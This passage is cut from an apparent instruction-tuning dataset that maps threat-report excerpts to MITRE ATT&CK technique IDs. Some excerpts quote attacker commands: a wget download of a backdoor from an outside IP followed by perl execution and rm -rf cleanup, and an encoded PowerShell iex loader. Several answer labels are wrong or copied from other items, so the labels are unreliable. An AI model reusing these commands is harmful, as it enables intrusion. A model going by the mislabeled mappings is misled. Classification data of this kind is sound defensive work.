C:\\ProgramData\\ManagerApp\\msvcr90.dll C:\\ProgramData\\ManagerApp\\d3d9.dll The \u201cAdapterTroubleshooter.exe\u201d file is a legitimate binary which is leveraged to use the famous DLL search order hijacking technique.\u00a0 The \u201cd3d9.dll\u201d file is malicious and is loaded into memory by the legit binary upon execution.\u00a0 Once loaded, the DLL will then inject FinSpy into the Winlogon process", + "output": "- T1055: Process Injection\n- T1574.002: Hijack Execution Flow - DLL Side-Loading\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "One such email that we were able to obtain was targeting users in Turkey, as shown in Figure 4: Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey, Pakistan, Tajikistan and India", + "output": "- T1598.002: Phishing for Information - Spearphishing Attachment\n- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "OopsIE Trojan Analysis The OopsIE Trojan delivered in these attacks is packed with SmartAssembly and further obfuscated with ConfuserEx v1.0.0", + "output": "- T1027: Obfuscated Files or Information\n- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Our analysis of the backdoors used in the September 2018 attacks show that AuditCred.dll/ROptimizer.dll was similarly used: \u00a0 FileTokenBroker.dll\u00a0 (2017 attack) AuditCred.dll/Roptimizer.dll\u00a0 (2018 attack) Launch Method Service Service Function Loader Component Loader Component Working directory %Windows%\\System32 %Windows%\\System32 Loaded Component Path %Windows%\\System32\\en-US %Program Files%\\Common Files\\System\\ado Loaded Component Blending Blends with .mui files Blend with ActiveX data Object dll files Table1: Similarities of the Loader components in both incidents Analysis of backdoors used in 2018 The Lazarus group used a series of backdoors in their 2018 attacks, employing a complicated technique that involves three major components: AuditCred.dll/ROptimizer.dll (detected by Trend Micro as BKDR_BINLODR.ZNFJ-A) \u2013 loader DLL that is launched as a service Msadoz.dll (detected by Trend Micro as BKDR64_BINLODR.ZNFJ-A) \u2013 encrypted backdoor n = number of characters in the loader dll\u2019s filename Auditcred.dll.mui/rOptimizer.dll.mui (detected by Trend Micro as TROJ_BINLODRCONF.ZNFJ-A) \u2013 encrypted configuration file Figure 1: Loading sequence of the modularized backdoor The loader DLL is installed as a service and uses different names (AuditCred and ROptimizer) on different machines", + "output": "- T1055: Process Injection\n- T1218.011: System Binary Proxy Execution - Rundll32\n- T1574.002: Hijack Execution Flow - DLL Side-Loading\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Our observation of related\u00a0actions\u00a0here: u ps start password stealing (Windows) Ps_mps/ps_hwi start start password stealing (Linux, MIPS,\u00a0 ARM) uper_mps/uper_hwi start rewrite hook module with a new version and launch it (Linux, MIPS, ARM) Nm_mps/nm_hwi start\u00a0 \u2013ban -middle Scan ports and retrieve banners on the router\u00a0subnet\u00a0 (Linux, MIPS,\u00a0 ARM) U fsget * 7 *.docx, *.pdf, *.doc * search for docs with the given filetypes (Windows) S sinfo retrieve information on installed programs and launch commands: systeminfo, tasklist, ipconfig, netstat, route print, tracert www.google.com (Windows) weap_mps/weap_hwi host188.128.123.52 port[25,26,110,465,995]\u00a0 typetcpconnect DDoS on 188.128.123.52 (Linux, MIPS,\u00a0 ARM) weap_mps/weap_hwi\u00a0 typesynflood port80 cnt100000 spdmedium host212.175.109.10 DDoS on 212.175.109.10 (Linux, MIPS,\u00a0 ARM) The issued commands for the Linux plugins suggest the attackers controlled infected MIPS/ARM devices.\u00a0We want to pay special attention to the DDoS commands meant for these routers", + "output": "- T1003: OS Credential Dumping" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Part of packed VM PCODE After unpacking, the PCODE it will look like the following: Unpacked PCODE After unpacking the virtual machine PCODE is then decrypted: Decrypted VM PCODE The custom virtual machine supports a total of 34 instructions: Example of parsed PCODE In this example, the \u201c1b\u201d instruction is responsible for executing native code that is specified in parameter field", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding\n- T1027.002: Obfuscated Files or Information - Software Packing\n- T1140: Deobfuscate/Decode Files or Information\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "POSHSPY WMI Component The WMI component of the POSHSPY backdoor leverages a Filter to execute the PowerShell component of the backdoor on a regular basis", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\\ProgramData\\ZIPSDK\\ProjectConfManagerNT.ini)))); PowerShell one-liner Encoded text file Execution flow: The PowerShell code When PowerShell is invoked whether via WMI, wscript.exe, or mshta.exe, it executes a one-liner PowerShell code (as outlined above) that reads the encoded text file dropped in ProgramData and then decodes it", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "PowerShell Script \u201c58d2a83f777942.26535794.ps1\u201d is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Previous related research: https://sec0wn.blogspot.com/2018/05/clearing-muddywater-analysis-of-new.html?m=1 https://reaqta.com/2017/11/muddywater-apt-targeting-middle-east/ https://blog.malwarebytes.com/threat-analysis/2017/09/elaborate-scripting-fu-used-in-espionage-attack-against-saudi-arabia-government_entity/ https://www.sekoia.fr/blog/falling-on-muddywater/ Decoy images by country Jordan The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc) DAMAMAX.doc Turkey Turkey\u2019s General Directorate of Security Turkey\u2019s Directorate General of Coastal Safety Turkey\u2019s General Directorate of Security (Onemli Rapor.doc) Turkey\u2019s Ministry of the Interior (Early election.doc) Saudi Arabia Document signed by the Major General Pilot, commander of the Saudi Royal Air Force KSA King Saud University (KSU) KSA King Saud University (KSU) Azerbaijan \u0130nki\u015faf \u00fc\u00e7\u00fcn g\u00f6r\u00fc\u015f.doc (meeting for development) Iraq Iraqi Ministry of Foreign Affairs Government of Iraq, the Treasury of the Council of Ministers Pakistan ECP.doc National Assembly of Pakistan.doc P.Police.doc Afghanistan President.doc, E-government of Afghanistan Technical details Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware", + "output": "- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Probably full and active window screenshot quality captureActiveQC 40 CaptureSites VPN*0,0 Login*0,0 mail*0,0 Security*0,0 Window titles of interest for screenshots, using left mouse button and Enter keypress hook important upLog.txt upSCRLog.txt upSpecial.txt upFile.txt upMSLog.txt List of files to send to C2 using bitsadmin.exe from the dedicated thread maxUpFileSizeKByte 1000000 Maximum size of file uploaded to C2 Servers http://108.61.189.174 Control server HTTP URL ZipPass KtJvOXulgibfiHk Password for uploaded zip archives browserPasswordCheckTimeout 300000 Milliseconds to wait between gathering key3.db, cookies.sqlite and other browser files in dedicated thread Most of the parameters are self-explanatory", + "output": "- T1071: Application Layer Protocol\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Procmon shows the malicious module loaded using the regsvr32.exe process.\u00a0\u00a0 Phase two: Payload Analysis\u00a0 \u00a0 The only module the XSL script loads is Irdsnhrxxxfery64, which is packed using the UPX packer", + "output": "- T1218.010: System Binary Proxy Execution - Regsvr32\n- T1027.002: Obfuscated Files or Information - Software Packing" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RAR Creates RAR files per logical drive containing data with timestamps for the past 7 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d", + "output": "- T1560: Archive Collected Data\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Read a specified file\u2019s contents and send the data to the control server Write data sent by the control server to an existing file Mark a file to be deleted on reboot Marking a file for deletion on reboot", + "output": "- T1070.006: Indicator Removal - Timestomp\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 use a payload that uses raw TCP connections for this communication", + "output": "- T1049: System Network Connections Discovery\n- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Reaver will then install itself as a service in the event it is running with SeDebugPrivilege privileges.\u00a0 The service is configured with a name, description, and display name that is provided within the configuration", + "output": "- T1007: System Service Discovery\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Registry key \u201cSoftware\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\\u201d is queried to gather proxy information with values ProxyEnable, Proxy: (NO), Proxy, ProxyServer", + "output": "- T1012: Query Registry\n- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Remexi includes different modules that it deploys in its working directory, including configuration decryption and parsing, launching victim activity logging in a separate module, and seven threads for various espionage and auxiliary functions", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "RIPTIDE\u2019s first communication with its C2 server fetches an encryption key, and the RC4 encryption key is used to encrypt all further communication", + "output": "- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SA Generates the following IRC client command that will be sent to the C2 server: PRIVMSG : Hello ,my name is\u00a0 , Im ready my Computer Name is: \u00a0 All of the commands, except for the VER command, must be issued by individuals in the IRC channel with nicknames that start with \u201cAS_\u201d or \u201cAF_\u201d", + "output": "- T1082: System Information Discovery\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Sample(s) f1b2bc0831445903c0d51b390b1987597009cc0fade009e07d792e8d455f6db0 5cc62ad6baf572dbae925f701526310778f032bb4a54b205bada78b1eb8c479c DNS tbs1/tbs2.microsoftonline.services Domains 0ffice365[.]agency 0ffice365[.]life 0ffice365[.]services 0nedrive[.]agency corewindows[.]agency microsoftonline[.]agency onedrive[.]agency sharepoint[.]agency skydrive[.]agency skydrive[.]services Sample eb33a96726a34dd60b053d3d1048137dffb1bba68a1ad6f56d33f5d6efb12b97 DNS tvs1/tvs2.trafficmanager.live Domains akamaiedge[.]live \u00a0 akamaized[.]live \u00a0 akdns[.]live \u00a0 edgekey[.]live Table 7: Sample and Domain Associations The third cluster of domains had six different nameservers associated with them, but unlike the other two clusters, were all directly tied to each other", + "output": "- T1007: System Service Discovery\n- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SCT File Analysis The code of the Defender.sct file is an obfuscated JavaScript", + "output": "- T1064: Scripting\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SECOND STAGE JAVASCRIPT INTO POWERSHELL: The second stage JavaScript creates a PowerShell file with the same name in the same directory", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1064: Scripting\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Service providers have significant access to customer networks, enabling an attacker who had compromised a service provider to move laterally into the network of the service provider\u2019s customer", + "output": "- T1543.003: Create or Modify System Process - Windows Service\n- T1021: Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Serving the backdoor Another HTTP request is sent to the targeted server, with the following resource: /?module=wget hxxp://67[.]209.177.163/ibus -O /tmp/e3ac24a0bcddfacd010a6c10f4a814bc The above standard injection pulls the ibus payload and stores it on /tmp/e3ac24a0bcddfacd010a6c10f4a814bc Launching the backdoor The execution is issued using an additional HTTP request: /?module=perl /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc;sleep 2;rm -rf /tmp/ e3ac24a0bcddfacd010a6c10f4a814bc That executes the perl script, puts it to sleep for two seconds and deletes the file to remove any evidence", + "output": "- T1074: Data Staged\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Similar to the previous case, if Avast and aswrundll.exe are on the machine, Irdsnhrxxxfery98 will be injected into that process instead of regsvr32.exe.\u00a0 Irdsnhrxxxfery64 injecting lrdsnhrxxfery98", + "output": "- T1055: Process Injection\n- T1218.010: System Binary Proxy Execution - Regsvr32" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Since Operation Clandestine Fox, we have observed this actor execute multiple attacks that did not rely on zero-day exploits.\u00a0The combination of this sustained operational tempo and lack of zero-day exploits may indicate that this group has changed strategy and has decided to attack more frequently and does not have steady access to zero-day exploit code.\u00a0No matter the strategy, this actor has shown an ability to operate successfully", + "output": "- T1203: Exploitation for Client Execution\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Some of the instances used in this script are: $eNv:puBLic[13]+$ENv:pUBLIc[5]+'x' ($ENV:cOMsPEC[4,26,25]-jOin'') XOR encoding: The biggest section of the PowerShell script is XOR encoded using a single byte key, as shown in Figure 11", + "output": "- T1573: Encrypted Channel\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration Exfiltration is done through the bitsadmin.exe utility", + "output": "- T1486: Data Encrypted for Impact\n- T1113: Screen Capture\n- T1115: Clipboard Data\n- T1560: Archive Collected Data\n- T1132: Data Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "SpyNote RAT is capable of performing a variety of alarming functions that\u00a0includes: Activating the device\u2019s microphone and listening to live\u00a0conversations Executing commands on the\u00a0device Copying files from the device to a Command & Control (C&C)\u00a0center Recording screen\u00a0captures Viewing\u00a0contacts Reading SMS\u00a0messages The screenshot below shows part of the sandbox\u2019s report on the SpyNote RAT\u2019s signature and detected\u00a0functions: Figure 1 :\u00a0Zscaler Cloud Sandbox\u00a0Detection The fake Netflix app we are analyzing in this blog appears to be built using an updated version of SpyNote RAT builder, which was\u00a0leaked last\u00a0year", + "output": "- T1043: Commonly Used Port\n- T1113: Screen Capture\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Strings in the backdoor are encrypted using a custom algorithm that uses XOR with a 4-byte key", + "output": "- T1573: Encrypted Channel\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Summary information for the three binaries we analyzed follows: MD5 364ff454dcf00420cff13a57bcb78467 SHA-256 8bca0031f3b691421cb15f9c6e71ce19335 5d2d8cf2b190438b6962761d0c6bb ssdeep 3072:n+1R4tREtGN4qyGCXdHPYK9l0H786 O26BmMAwyWMn/qwwiHNl:n+1R43QcIL XdF0w6IBmMAwwCwwi Size 141.2 KB (144560 bytes) Type ELF 64-bit (stripped) Install as root /bin/rsyncd Root install desc synchronize and backup service Install as non-root ~/.config/dbus-notifier/dbus-inotifier Non-root install desc system service d-bus notifier C2 azureon-line[.]com (TCP/80) Usage Timeframe Late 2014 Table 1: Sample 1 \u2013 Late 2014 Sofacy 64-bit Fysbis MD5 075b6695ab63f36af65f7ffd45cccd39 SHA-256 02c7cf55fd5c5809ce2dce56085ba43795f2 480423a4256537bfdfda0df85592 ssdeep 3072:9ZAxHANuat3WWFY9nqjwbuZf454U NqRpROIDLHaSeWb3LGmPTrIW33HxIajF: 9ZAxHANJAvbuZf454UN+rv eQLZPTrV3Z Size 175.9 KB (180148 bytes) Type ELF 32-bit (stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 198.105.125[.]74 (TCP/80) Usage Timeframe Early 2015 Table 2: Sample 2 \u2013 Early 2015 Sofacy 32-bit Fysbis MD5 e107c5c84ded6cd9391aede7f04d64c8 SHA-256 fd8b2ea9a2e8a67e4cb3904b49c789d57ed 9b1ce5bebfe54fe3d98214d6a0f61 ssdeep 6144:W/D5tpLWtr91gmaVy+mdckn6BCUd c4mLc2B9:4D5Lqgkcj+ Size 314.4 KB (321902 bytes) Type ELF 64-bit (not stripped) Install as root /bin/ksysdefd Root install desc system kernel service defender Install as non-root ~/.config/ksysdef/ksysdefd Non-root install desc system kernel service defender C2 mozilla-plugins[.]com (TCP/80) Usage Timeframe Late 2015 Table 3: Sample 3 \u2013 Late 2015 Sofacy 64-bit Fysbis Overall, these binaries are assessed as low sophistication, but effective", + "output": "- T1082: System Information Discovery\n- T1543.003: Create or Modify System Process - Windows Service\n- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "System info: Computer name System info using: cmd /c systeminfo >%temp%\\temp.ini List of currently running process using: cmd /c tasklist >%temp%\\temp.ini Exfiltration The data exfiltration process runs in the following 